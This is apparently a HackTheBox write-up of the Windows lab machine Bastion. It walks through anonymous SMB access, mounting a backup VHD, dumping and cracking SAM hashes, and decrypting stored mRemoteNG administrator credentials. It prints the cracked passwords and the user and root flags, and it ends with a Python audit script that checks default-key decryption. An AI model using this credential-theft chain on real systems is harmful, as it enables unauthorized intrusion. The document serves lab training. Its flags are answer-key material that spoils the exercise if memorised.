HackTheBox — Bastion

2020-02-07  ·  HTB   Windows

[screenshot: Bastion machine info]

Target: 10.10.10.134


Recon

nmap -sV -sC -oA nmap/Bastion 10.10.10.134
[screenshot: nmap output]

SMB Enumeration

List the SMB shares over a null (anonymous) session (bastion.htb is assumed to resolve to 10.10.10.134 via an /etc/hosts entry):

smbclient --list //bastion.htb/ -U ''
[screenshot: smb shares]

Backups is the only accessible share. Connect and browse:

smbclient //10.10.10.134/Backups -U ''
[screenshot: Backups share listing]

The share holds a Windows image backup; the VHD files sit in its Backup directory.


Mount the VHD

Mount the SMB share locally, then use guestmount to mount the VHD read-only:

# Mount the SMB share as guest, read-only
mkdir -p /mnt/smb
mount -t cifs -o guest,ro //10.10.10.134/Backups /mnt/smb

# Install guestfs tools if needed
apt install libguestfs-tools

# Mount the VHD (run from the directory under /mnt/smb that contains the .vhd file)
mkdir -p /mnt/vhd2
guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd2
[screenshot: guestmount]

Browse the mounted VHD. Check the user's profile folders first, then go to Windows/System32/config, where the registry hives live:

find Desktop Documents/ Downloads/ -ls
[screenshot: files found]

Extract SAM Hashes

Copy the SAM and SYSTEM hives out of the VHD and dump the local account hashes offline:

cd /mnt/vhd2/Windows/System32/config
mkdir -p /root/htb/bastion/backup-dump
cp SAM SYSTEM /root/htb/bastion/backup-dump/
cd /root/htb/bastion/backup-dump/

impacket-secretsdump -sam SAM -system SYSTEM local
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[screenshot: secretsdump]

The Administrator NT hash is the well-known hash of an empty password (31d6cfe0...), and the account is disabled, so it is of no use here. Crack L4mpje's hash instead (NTLM is hashcat mode 1000):

# CrackStation or hashcat
hashcat -m 1000 26112010952d963c8dc4217daec986d9 rockyou.txt
[screenshot: CrackStation result]

Result: bureaulampje


Foothold — SSH

ssh L4mpje@10.10.10.134
# password: bureaulampje
[screenshot: ssh shell]
type C:\Users\L4mpje\Desktop\user.txt

User flag: 9bfe57d5c3309db3a151772f9d86c6cd


Privesc — mRemoteNG Credential Extraction

JAWS enumeration shows mRemoteNG is installed. mRemoteNG is known to store connection credentials insecurely in confCons.xml: the passwords are encrypted, but with a hard-coded default master password unless the user sets their own, so they can be recovered offline.

[screenshot: JAWS output showing mRemoteNG]
# Download confCons.xml from the target
scp l4mpje@10.10.10.134:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .
[screenshot: confCons.xml]

The file contains the encrypted Administrator RDP credentials. Decrypt them with mremoteng-decrypt; no cracking is needed because they are encrypted under the default master password:

cat confCons.xml | grep Password
python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
# Password: thXLHM96BeKL0ER2
[screenshot: decrypt result]
ssh administrator@10.10.10.134
# password: thXLHM96BeKL0ER2
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt

Root flag: 958850b91811676ed6620a9c430e65c8

[screenshot: root flag]
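As an added example (not code from the write-up or from the mRemoteNG project), the following Python audits a confCons.xml the way a defender reviewing a jump host would: it reads the file-level crypto parameters, lists every connection that stores a password inline, recovers the password length from the GCM ciphertext length, and reports whether each entry authenticates under mRemoteNG's built-in default master password, without ever returning the plaintext. The format assumptions are those of mRemoteNG 1.75+, the format the decrypt script above handles: the Password attribute is base64(salt[16] | nonce[16] | ciphertext | tag[16]), the key is PBKDF2-HMAC-SHA1(master password, salt, KdfIterations, 32 bytes), the cipher is AES-GCM with the salt as associated data, and the default master password is "mR3m". The sample XML is constructed around the Password blob shown above; the second connection and its hostname are invented. The GCM check needs the `cryptography` package and returns None when it is absent.

```python
"""Audit an mRemoteNG confCons.xml for credentials protected only by the default master password.

Added example, not part of the write-up or of mRemoteNG itself.
"""
import base64
import hashlib
import xml.etree.ElementTree as ET

# mRemoteNG's hard-coded default master password, used unless the user sets one.
DEFAULT_MASTER_PASSWORD = "mR3m"


def parse_blob(b64: str) -> dict:
    """Split a stored Password value into salt | nonce | ciphertext | GCM tag."""
    raw = base64.b64decode(b64)
    if len(raw) < 48:
        raise ValueError("Password blob too short for salt + nonce + tag")
    return {"salt": raw[:16], "nonce": raw[16:32], "ciphertext": raw[32:-16], "tag": raw[-16:]}


def default_key_authenticates(blob: dict, iterations: int,
                              master_password: str = DEFAULT_MASTER_PASSWORD):
    """True if the GCM tag verifies under master_password (so no custom master password
    protects this entry), False if it does not, None if 'cryptography' is not installed.
    The decrypted plaintext is discarded, never returned."""
    try:
        from cryptography.exceptions import InvalidTag
        from cryptography.hazmat.primitives.ciphers.aead import AESGCM
    except ImportError:
        return None
    key = hashlib.pbkdf2_hmac("sha1", master_password.encode("utf-8"),
                              blob["salt"], iterations, dklen=32)
    try:
        AESGCM(key).decrypt(blob["nonce"], blob["ciphertext"] + blob["tag"], blob["salt"])
        return True
    except InvalidTag:
        return False


def audit_confcons(xml_text: str) -> dict:
    """Summarise the file-level crypto settings and every connection that stores a password."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    iterations = int(root.get("KdfIterations", "1000"))
    report = {
        "engine": f"{root.get('EncryptionEngine')}-{root.get('BlockCipherMode')}",
        "kdf_iterations": iterations,
        "full_file_encryption": root.get("FullFileEncryption") == "true",
        "connections": [],
    }
    for node in root.iter():
        if node.tag.rsplit("}", 1)[-1] != "Node":       # tolerate namespaced or plain <Node>
            continue
        stored = node.get("Password", "")
        entry = {"name": node.get("Name"), "username": node.get("Username"),
                 "hostname": node.get("Hostname"), "protocol": node.get("Protocol"),
                 "stored_password": bool(stored)}
        if stored:
            blob = parse_blob(stored)
            entry["password_length"] = len(blob["ciphertext"])   # GCM preserves length
            entry["default_master_key"] = default_key_authenticates(blob, iterations)
        report["connections"].append(entry)
    return report


# Constructed sample: the "DC" entry carries the Password blob from the write-up;
# the "jump" entry and its hostname are invented to show a node with nothing stored.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain="" Hostname="127.0.0.1"
        Protocol="RDP" Port="3389"
        Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" />
  <Node Name="jump" Type="Connection" Username="ops" Hostname="jump.example.invalid"
        Protocol="SSH2" Port="22" Password="" />
</mrng:Connections>
"""

if __name__ == "__main__":
    report = audit_confcons(SAMPLE_CONFCONS)
    print(f"cipher {report['engine']}, PBKDF2 iterations {report['kdf_iterations']}")
    verdict = {True: "protected ONLY by the default master password",
               False: "custom master password set",
               None: "install 'cryptography' to check the master password"}
    for c in report["connections"]:
        if not c["stored_password"]:
            print(f"{c['name']}: no stored password")
            continue
        print(f"{c['name']} ({c['protocol']} {c['username']}@{c['hostname']}): "
              f"{c['password_length']}-char password, {verdict[c['default_master_key']]}")
```

The verdict that matters is default_master_key == True: the entry is protected by a public constant and a 1000-iteration KDF, so anyone who can read the file can recover it, and even without the key the ciphertext length gives away the password length (16 characters here). The fixes are to set a custom master password in mRemoteNG or, better, to stop saving privileged credentials in the connection file at all.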
